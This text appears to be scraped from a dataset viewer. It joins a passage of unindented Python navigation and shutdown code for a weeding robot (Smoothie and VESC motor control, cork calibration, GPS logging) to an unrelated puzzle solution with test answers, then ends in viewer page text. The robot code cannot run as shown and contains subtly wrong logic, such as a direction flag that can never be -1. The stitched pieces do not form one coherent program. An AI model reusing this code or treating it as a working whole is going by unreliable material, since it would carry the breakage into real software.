if path_points[traj_path_start_index][1] > 0 and not math.isclose(
path_points[traj_path_start_index][1], 0):
break
traj_path_start_index += 1
else:
smooth_preparation_ok = False
msg = "USING RUDE TRAJECTORY APPROACHING as couldn't find any further points " \
"with positive speed to continue zigzag job."
logger_full.write(msg + "\n")
# check if robot tries to skip or revert too many path points
if abs(traj_path_start_index - path_start_index) > config.SMOOTH_APPROACHING_MAX_POINTS:
smooth_preparation_ok = False
msg = f"Robot wants to visit too many previous points or skip too many job points; " \
f"traj_start_idx={traj_path_start_index}; path_start_idx={path_start_index}, exiting."
logger_full.write(msg + "\n")
# approach trajectory smoothly if preparation was successful
if smooth_preparation_ok:
# for future points (nav predictor)
i_inf = traj_path_start_index + 1 if traj_path_start_index + 1 < path_end_index \
else path_end_index
i_sup = traj_path_start_index + 1 + config.FUTURE_NUMBER_OF_POINTS \
if traj_path_start_index + config.FUTURE_NUMBER_OF_POINTS < path_end_index \
else path_end_index
# if smooth approach target point is or further than job start point
# (move to this point and start job)
move_to_point_and_extract(
[cur_pos, path_points[traj_path_start_index][0]],
gps,
vesc_engine,
smoothie,
camera,
periphery_detector,
precise_detector,
logger_full,
report_field_names,
trajectory_saver,
working_zone_polygon,
config.DEBUG_IMAGES_PATH,
nav,
data_collector,
log_cur_dir,
image_saver,
notification,
extraction_manager_v3,
ui_msg_queue,
path_points[traj_path_start_index][1],
False,
navigation_prediction,
path_points[i_inf:i_sup],
not config.FIRST_POINT_NO_EXTRACTIONS,
x_scan_poly,
field_gps_coords
)
if traj_path_start_index >= path_start_index:
path_start_index = traj_path_start_index + 1
else:
for i in range(traj_path_start_index + 1, path_start_index - 1):
i_inf = i + 1 if i + 1 < path_end_index else path_end_index
i_sup = i + 1 + config.FUTURE_NUMBER_OF_POINTS \
if i + config.FUTURE_NUMBER_OF_POINTS < path_end_index else path_end_index
move_to_point_and_extract(
[path_points[i - 1][0], path_points[i][0]],
gps,
vesc_engine,
smoothie,
camera,
periphery_detector,
precise_detector,
logger_full,
report_field_names,
trajectory_saver,
working_zone_polygon,
config.DEBUG_IMAGES_PATH,
nav,
data_collector,
log_cur_dir,
image_saver,
notification,
extraction_manager_v3,
ui_msg_queue,
path_points[i][1],
False,
navigation_prediction,
path_points[i_inf:i_sup],
not config.FIRST_POINT_NO_EXTRACTIONS,
x_scan_poly,
field_gps_coords
)
elif config.FORWARD_BACKWARD_PATH:
msg = "USING RUDE TRAJECTORY APPROACHING as forward-backward path is not supported yet by " \
"smooth approaching feature."
logger_full.write(msg + "\n")
else:
msg = "USING RUDE TRAJECTORY APPROACHING as all known/supported path generation modes are " \
"disabled, probably config path generation settings are corrupted"
logger_full.write(msg + "\n")
# move through path points
for i in range(path_start_index, path_end_index):
if config.NAVIGATION_TEST_MODE:
dist_here_point_a = nav.get_distance(
start_position, config.POINT_A[0])
dist_here_point_b = nav.get_distance(
start_position, config.POINT_B[0])
if dist_here_point_a > dist_here_point_b:
from_to = [config.POINT_B[0], config.POINT_A[0]]
speed = config.POINT_A[1]
else:
from_to = [config.POINT_A[0], config.POINT_B[0]]
speed = config.POINT_B[1]
display_instruction_path = from_to[0:2]
else:
from_to = [path_points[i - 1][0], path_points[i][0]]
speed = path_points[i][1]
i_inf = i-config.DELTA_DISPLAY_INSTRUCTION_PATH if i >= config.DELTA_DISPLAY_INSTRUCTION_PATH else 0
i_sup = i+config.DELTA_DISPLAY_INSTRUCTION_PATH if i + \
config.DELTA_DISPLAY_INSTRUCTION_PATH < path_end_index else path_end_index-1
display_instruction_path = [elem[0]
for elem in path_points[i_inf:i_sup]]
if ui_msg_queue is not None and config.DISPLAY_INSTRUCTION_PATH:
ui_msg_queue.send(json.dumps(
{"display_instruction_path": display_instruction_path}))
if last_direction_of_travel is None:
# 1 -> moving forward #-1 -> moving backward
last_direction_of_travel = (speed >= 0) if 1 else -1
# 1 -> moving forward #-1 -> moving backward
direction_of_travel = (speed >= 0) if 1 else -1
if direction_of_travel != last_direction_of_travel:
vesc_engine.set_target_rpm(
speed * config.MULTIPLIER_SI_SPEED_TO_RPM, vesc_engine.PROPULSION_KEY)
if config.WHEELS_STRAIGHT_CHANGE_DIRECTION_OF_TRAVEL and direction_of_travel != last_direction_of_travel:
vesc_engine.stop_moving(vesc_engine.PROPULSION_KEY)
response = smoothie.custom_move_to(
A_F=config.A_F_MAX, A=0)
if response != smoothie.RESPONSE_OK:
msg = "Smoothie response is not ok: " + response
print(msg)
logger_full.write(msg + "\n")
smoothie.wait_for_all_actions_done()
i_inf = i + 1 if i + 1 < path_end_index else path_end_index
i_sup = i + 1 + config.FUTURE_NUMBER_OF_POINTS \
if i + config.FUTURE_NUMBER_OF_POINTS < path_end_index else path_end_index
move_to_point_and_extract(
from_to,
gps,
vesc_engine,
smoothie,
camera,
periphery_detector,
precise_detector,
logger_full,
report_field_names,
trajectory_saver,
working_zone_polygon,
config.DEBUG_IMAGES_PATH,
nav,
data_collector,
log_cur_dir,
image_saver,
notification,
extraction_manager_v3,
ui_msg_queue,
speed,
False,
navigation_prediction,
path_points[i_inf:i_sup],
not i == path_start_index
if config.FIRST_POINT_NO_EXTRACTIONS and config.CONTINUE_PREVIOUS_PATH and
not config.USE_SMOOTH_APPROACHING_TO_FIELD else True,
x_scan_poly,
field_gps_coords
)
if config.ENABLE_ADDITIONAL_WHEELS_TURN and \
i - 1 in bezier_points_indexes and i in bezier_points_indexes:
cur_pos = gps.get_last_position()
if cur_pos[2] != "4":
msg = f"Additional wheels turn got point {cur_pos} with non 4 quality - " \
f"skipping wheels turn actions"
logger_full.write(msg + "\n")
else:
deviation, side = nav.get_deviation(path_points[i-1][0], path_points[i][0], cur_pos)
if deviation > config.ADDITIONAL_WHEELS_TURN_THRESHOLD and side == -1:
msg = f"Wheels turn deviation threshold hit, trying to turn wheels"
logger_full.write(msg + "\n")
if smoothie_tel_conn is not None:
smoothie_tel_conn.write(
f"G0 {config.ADDITIONAL_WHEELS_KEY}"
f"{config.ADDITIONAL_WHEELS_VALUE} "
f"F{config.ADDITIONAL_WHEELS_FORCE}")
res = smoothie_tel_conn.read_some()
if res != smoothie.RESPONSE_OK:
msg = f"Couldn't do additional wheels turn, smoothie response:\n{res}"
logger_full.write(msg + "\n")
else:
msg = f"Couldn't turn wheels as smoothie telnet connector is None"
logger_full.write(msg + "\n")
if config.NAVIGATION_TEST_MODE:
response = smoothie.custom_move_to(
A_F=config.A_F_MAX, A=0)
if response != smoothie.RESPONSE_OK: # TODO: what if response is not ok?
msg = "Couldn't turn wheels before other navigation test, smoothie response:\n" + response
print(msg)
logger_full.write(msg + "\n")
else:
with open(config.LAST_ANGLE_WHEELS_FILE, "w+") as wheels_angle_file:
wheels_angle_file.write(
str(smoothie.get_adapter_current_coordinates()["A"]))
test_continue = input(
"Press enter to continue the test, type anything to exit.")
if test_continue != "":
notification.close()
break
try:
start_position = utility.average_point(
gps, trajectory_saver, nav)
except:
pass
if ui_msg_queue is not None:
ui_msg_queue.send(json.dumps({"clear_path": True}))
# reload config if kp or ki change
importlib.reload(config)
# 1 -> moving forward #-1 -> moving backward
last_direction_of_travel = (speed >= 0) if 1 else -1
# save path progress (index of next point to move)
path_index_file.seek(0)
path_index_file.write(str(i + 1))
path_index_file.flush()
"""
msg = "Starting memory cleaning"
logger_full.write(msg + "\n")
cleaning_start_t = time.time()
memory_manager.start_clean_manual_blocking()
cleaning_end_t = time.time()
msg = "Cleaning elapsed time: " + str(cleaning_end_t - cleaning_start_t)
logger_full.write(msg + "\n")
"""
# calibration
if time.time() > next_calibration_time:
msg = "Calibrating cork after reaching path point. Current config.CORK_CALIBRATION_MIN_TIME is "\
+ str(config.CORK_CALIBRATION_MIN_TIME)
logger_full.write(msg + "\n")
next_calibration_time = time.time() + config.CORK_CALIBRATION_MIN_TIME
smoothie.ext_calibrate_cork()
# mark path as passed (set next point index to -1)
path_index_file.seek(0)
path_index_file.write(str(-1))
path_index_file.flush()
msg = "Path is successfully passed."
print(msg)
logger_full.write(msg + "\n")
notification.close()
except KeyboardInterrupt:
msg = "Stopped by a keyboard interrupt (Ctrl + C)\n" + \
traceback.format_exc()
print(msg)
logger_full.write(msg + "\n")
notification.set_robot_state(RobotStates.ENABLED)
notification.close()
if ui_msg_queue is not None:
ui_msg_queue.close()
except:
msg = "Exception occurred:\n" + traceback.format_exc()
print(msg)
logger_full.write(msg + "\n")
notification.set_robot_state(RobotStates.OUT_OF_SERVICE)
if ui_msg_queue is not None:
ui_msg_queue.close()
finally:
# put the wheel straight
# vesc z axis calibration in case it's used for z axis control instead of smoothie
# (to prevent cork breaking when smoothie calibrates)
smoothie_safe_calibration = True
if config.EXTRACTION_CONTROLLER == 2:
with adapters.VescAdapterV4(
vesc_address,
config.VESC_BAUDRATE,
config.VESC_ALIVE_FREQ,
config.VESC_CHECK_FREQ,
config.VESC_STOPPER_CHECK_FREQ) as vesc_engine:
# Z-5 fix (move cork little down to stop touching stopper)
vesc_engine.set_target_rpm(
config.VESC_EXTRACTION_CALIBRATION_Z5_FIX_RPM, vesc_engine.EXTRACTION_KEY)
vesc_engine.set_time_to_move(
config.VESC_EXTRACTION_CALIBRATION_Z5_FIX_TIME,
vesc_engine.EXTRACTION_KEY)
vesc_engine.start_moving(vesc_engine.EXTRACTION_KEY)
vesc_engine.wait_for_stop(vesc_engine.EXTRACTION_KEY)
# calibration
vesc_engine.set_target_rpm(
config.VESC_EXTRACTION_CALIBRATION_RPM, vesc_engine.EXTRACTION_KEY)
vesc_engine.set_time_to_move(
config.VESC_EXTRACTION_CALIBRATION_MAX_TIME,
vesc_engine.EXTRACTION_KEY)
vesc_engine.start_moving(vesc_engine.EXTRACTION_KEY)
res = vesc_engine.wait_for_stopper_hit(
vesc_engine.EXTRACTION_KEY,
config.VESC_EXTRACTION_CALIBRATION_MAX_TIME)
vesc_engine.stop_moving(vesc_engine.EXTRACTION_KEY)
if not res:
smoothie_safe_calibration = False
print(
"Stopped vesc EXTRACTION engine calibration due timeout (stopper signal wasn't received)\n",
"WHEELS POSITION WILL NOT BE SAVED PROPERLY!", sep="")
# put the robot's wheels straight
if smoothie_safe_calibration:
msg = f"Trying to put wheels straight before shutdown"
logger_full.write(msg + "\n")
if os.path.isfile(config.LAST_ANGLE_WHEELS_FILE):
msg = f"Found '{config.LAST_ANGLE_WHEELS_FILE}' file, trying to read wheels smoothie position"
logger_full.write(msg + "\n")
with open(config.LAST_ANGLE_WHEELS_FILE, "r+") as wheels_angle_file:
line = wheels_angle_file.read().strip()
angle = None
try:
angle = float(line)
msg = f"Successfully loaded wheels smoothie position: {angle}"
logger_full.write(msg + "\n")
except ValueError:
msg = f"Couldn't convert '{line}' into float position, leaving wheels position as it is"
print(msg)
logger_full.write(msg + "\n")
if angle is not None:
with adapters.SmoothieAdapter(smoothie_address) as smoothie:
smoothie.set_current_coordinates(A=angle)
response = smoothie.custom_move_to(
A_F=config.A_F_MAX, A=0)
if response != smoothie.RESPONSE_OK:
msg = "Couldn't turn wheels before shutdown, smoothie response:\n" + response
print(msg)
logger_full.write(msg + "\n")
else:
wheels_angle_file.seek(0)
wheels_angle_file.write(
str(smoothie.get_adapter_current_coordinates()["A"]))
else:
msg = f"Couldn't find '{config.LAST_ANGLE_WHEELS_FILE}' wheels smoothie position file.\n" \
f"Creating new file with 0.0 position containing. Robot may navigate wrong of wheels are turned."
print(msg)
logger_full.write(msg + "\n")
with open(config.LAST_ANGLE_WHEELS_FILE, "w") as wheels_angle_file:
wheels_angle_file.write("0.0")
# save adapter points history
try:
# TODO: reduce history positions to 1 to save RAM
# TODO: gps adapter is blocking now if has no points
adapter_points_history = gps.get_last_positions_list()
if len(adapter_points_history) > 0:
save_gps_coordinates(adapter_points_history,
log_cur_dir + "adapter_gps_history.txt")
else:
msg = "adapter_gps_history list has 0 elements!"
print(msg)
logger_full.write(msg + "\n")
except:
pass
# save session statistics TODO: its temporary
msg = "Saving statistics..."
logger_full.write(msg + "\n")
print(msg)
try:
data_collector.save_all_data(
log_cur_dir + config.STATISTICS_OUTPUT_FILE)
data_collector.dump_to_file(
log_cur_dir + config.DATACOLLECTOR_SAVE_FILE)
except:
msg = "Failed to save txt statistics:\n" + traceback.format_exc()
logger_full.write(msg + "\n")
print(msg)
try:
data_collector.close()
except:
msg = "Failed to close properly DB:\n" + traceback.format_exc()
logger_full.write(msg + "\n")
print(msg)
# close log and hardware connections
msg = "Closing loggers..."
logger_full.write_and_flush(msg + "\n")
print(msg)
logger_full.close()
try:
posix_ipc.unlink_message_queue(config.QUEUE_NAME_UI_MAIN)
except:
pass
if detection.YoloDarknetDetector.webStream is not None:
detection.YoloDarknetDetector.webStream.terminate()
detection.YoloDarknetDetector.webStream.join()
print("Safe disable is done.")
# Script entry point: run the robot's main navigation session only when this
# file is executed directly (not when imported as a module).
if __name__ == '__main__':
    main()
|
def printgrid(arr):
    """Print each row of *arr* on its own line for debugging; always return 0."""
    for row in arr:
        print(row)
    return 0
def solution(blocks):
    """Reconstruct a triangular difference grid from (index, value) seeds.

    blocks: list of [idx, val] pairs; row i of the grid has i + 1 cells,
    and cell idx of row i is seeded with val.  The remaining cells of each
    row are derived from the row above: a cell left of the seed equals the
    cell directly above it minus its right neighbour, and a cell right of
    the seed equals the cell above-left minus its left neighbour.

    Returns the grid flattened row by row as a single list.
    """
    grid = [[0] * (i + 1) for i in range(len(blocks))]
    for i, (idx, val) in enumerate(blocks):
        grid[i][idx] = val
        # Fill leftwards from the seed; the right neighbour grid[i][j + 1]
        # is already known at each step.
        for j in range(idx - 1, -1, -1):
            grid[i][j] = grid[i - 1][j] - grid[i][j + 1]
        # Fill rightwards from the seed; the left neighbour grid[i][j - 1]
        # is already known at each step.
        for j in range(idx + 1, i + 1):
            grid[i][j] = grid[i - 1][j - 1] - grid[i][j - 1]
    return [cell for row in grid for cell in row]
if __name__ == "__main__":
    # (problem, expected answer) pairs used as a lightweight self-test.
    cases = [
        ([[0, 50], [0, 22], [2, 10], [1, 4], [4, -13]],
         [50, 22, 28, 4, 18, 10, 0, 4, 14, -4, 1, -1, 5, 9, -13]),
        ([[0, 92], [1, 20], [2, 11], [1, -81], [3, 98]],
         [92, 72, 20, 63, 9, 11, 144, -81, 90, -79, 217, -73, -8, 98, -177]),
    ]
    for prob, expected in cases:
        got = solution(prob)
        print("correct?: {}".format(got == expected))
        print("predict: {}".format(got))
        print("answer: {}".format(expected))
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.